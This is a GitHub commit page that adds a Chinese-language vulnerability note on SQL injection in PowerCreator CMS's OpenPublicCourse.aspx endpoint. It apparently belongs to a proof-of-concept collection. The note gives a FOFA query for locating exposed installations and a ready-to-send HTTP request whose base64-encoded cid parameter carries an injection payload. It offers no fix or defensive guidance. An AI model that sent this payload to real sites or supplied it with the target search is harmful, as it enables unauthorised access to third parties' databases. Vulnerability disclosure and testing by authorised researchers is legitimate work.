Update and rename 1 to PowerCreator接口OpenPublicCourse.aspx存在sql注入漏洞.md

This commit is contained in:
Rainyseason 2025-03-17 09:29:46 +08:00 committed by GitHub
parent a53b36c071
commit 71e04886ed
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 28 additions and 1 deletions

View File

@ -1 +0,0 @@

View File

@ -0,0 +1,28 @@
## PowerCreator接口OpenPublicCourse.aspx存在sql注入漏洞
PowerCreator接口 OpenPublicCourse.aspx存在sql注入漏洞。攻击者可利用该漏洞获取服务器上的信息。
## fofa
```yaml
app="PowerCreator-CMS"
```
![image](https://github.com/user-attachments/assets/fcc5c0c8-6a56-42a0-9aba-0d65b1d63a56)
## poc
```yaml
GET /OpenPublicCourse.aspx?cid=NSBhbmQgMT1zeXMuZm5fc3FsdmFyYmFzZXRvc3RyKEhhc2hCeXRlcygnTUQ1JywnMTIzNDU2JykpLS0%3D HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ASP.NET_SessionId=l2wuj2tri5e554020jeezoyw; language=simpleChineses
Pragma: no-cache
Cache-Control: no-cache
```